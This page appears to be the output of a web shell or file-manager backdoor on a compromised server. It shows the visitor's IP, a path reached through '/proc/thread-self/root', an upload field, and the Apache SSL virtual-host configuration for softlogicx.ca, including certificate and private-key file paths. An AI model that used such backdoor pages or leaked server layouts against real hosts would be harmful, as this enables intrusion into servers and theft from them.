Your IP : 216.73.216.91


Current Path : /proc/thread-self/root/var/backup_vhost/
Upload File :
Current File : //proc/thread-self/root/var/backup_vhost/softlogicx.ca-le-ssl.conf

<IfModule mod_ssl.c>
<VirtualHost *:443>
   ServerAdmin webmaster@softlogicx.ca
   DocumentRoot /var/www/html/softlogicxwebsite
   ServerName softlogicx.ca
   ServerAlias www.softlogicx.ca
   ErrorLog logs/softlogicx-error_log
   CustomLog logs/softlogicx-access_log common
   <Directory "/var/www/html/softlogicxwebsite">
       AllowOverride all
   </Directory>

Include /etc/letsencrypt/options-ssl-apache.conf
SSLCertificateFile /etc/letsencrypt/live/softlogicx.ca/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/softlogicx.ca/privkey.pem
</VirtualHost>
</IfModule>